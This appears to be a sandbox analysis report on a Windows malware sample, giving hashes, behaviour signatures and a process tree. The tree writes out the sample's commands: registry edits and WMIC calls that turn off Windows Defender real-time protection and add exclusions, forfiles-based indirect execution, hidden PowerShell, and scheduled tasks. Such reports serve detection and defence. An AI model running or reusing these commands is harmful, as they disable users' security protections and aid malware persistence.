Analysis

  • max time kernel
    206s
  • max time network
    208s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    01-08-2024 22:49

General

  • Target

    c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959.exe

  • Size

    7.3MB

  • MD5

    229cea6f5b06c28fb63c9057ac31a256

  • SHA1

    7689b1ad09b5cf9f24de238a72c5d590e8193bc9

  • SHA256

    c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959

  • SHA512

    2371e82db78a0f41f5ac08781fff42ae5109a214929b5e216db0426fc31f2b7b26399ee02c7ac8555121fb51fff713943928c35893581cbf69fe8b8d0b53c336

  • SSDEEP

    196608:91OZK9Lufgodr+GoEHYy8swGDKoRwNz10rlIuSU+Yot0E:3OZgLkXdKGRYy4om16GU4v

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959.exe
    "C:\Users\Admin\AppData\Local\Temp\c5f031c06ef95607505c7f0940f5f401ce45e93b5d003843d1ee0d9ee6b38959.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2844
    • C:\Users\Admin\AppData\Local\Temp\7zS6DFF.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3012
      • C:\Users\Admin\AppData\Local\Temp\7zS6FC3.tmp\Install.exe
        .\Install.exe /pbdidLCzOS "385137" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2780
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2708
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2592
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2588
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2608
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2636
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2668
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                      PID:2716
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Indirect Command Execution
                  PID:1224
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:2236
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                        PID:568
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Indirect Command Execution
                    PID:704
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:480
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:636
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:852
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  4⤵
                  • Indirect Command Execution
                  PID:2796
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2784
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1196
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2820
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bcCGPajShxGMlZQUJS" /SC once /ST 22:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\uXXEkrFdncXudTH\vCmVOWv.exe\" FU /iydidEXW 385137 /S" /V1 /F
                  4⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2140
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 592
                  4⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2268
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {50F884EF-FD15-48AC-AEAD-FA9A4131D118} S-1-5-18:NT AUTHORITY\System:Service:
            1⤵
              PID:1760
              • C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\uXXEkrFdncXudTH\vCmVOWv.exe
                C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\uXXEkrFdncXudTH\vCmVOWv.exe FU /iydidEXW 385137 /S
                2⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:3016
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2452
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    4⤵
                    • Indirect Command Execution
                    PID:1268
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1956
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        6⤵
                          PID:2240
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:2116
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1936
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2264
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:2004
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                          PID:2428
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:2156
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        PID:284
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:1752
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                            6⤵
                              PID:572
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:492
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                              PID:2284
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1240
                                • C:\Windows\SysWOW64\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:404
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gKAXCAZbO" /SC once /ST 00:34:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:1592
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gKAXCAZbO"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:816
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /DELETE /F /TN "gKAXCAZbO"
                          3⤵
                            PID:3048
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1944
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                              4⤵
                              • Modifies Windows Defender Real-time Protection settings
                              PID:2308
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1568
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                              4⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • System Location Discovery: System Language Discovery
                              PID:1572
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "gcLJeFZRb" /SC once /ST 01:20:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:2876
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "gcLJeFZRb"
                            3⤵
                              PID:2904
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gcLJeFZRb"
                              3⤵
                                PID:2832
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                3⤵
                                • Indirect Command Execution
                                PID:1716
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1924
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2656
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1196
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2928
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2580
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2800
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2916
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                  PID:272
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                      PID:2976
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1908
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                        PID:2956
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C copy nul "C:\Windows\Temp\yryKlDDJVLpCRzjJ\tyBRSUfG\BMfsKzRuFjcKcQJc.wsf"
                                      3⤵
                                        PID:2064
                                      • C:\Windows\SysWOW64\wscript.exe
                                        wscript "C:\Windows\Temp\yryKlDDJVLpCRzjJ\tyBRSUfG\BMfsKzRuFjcKcQJc.wsf"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        PID:2936
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1796
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2492
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1268
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2116
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1752
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:1060
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:920
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2168
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:3028
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:988
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wTVsRuZmkGlUMZVB" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1992
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wTVsRuZmkGlUMZVB" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1624
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1120
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:1672
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1556
                                        • C:\Windows\SysWOW64\reg.exe
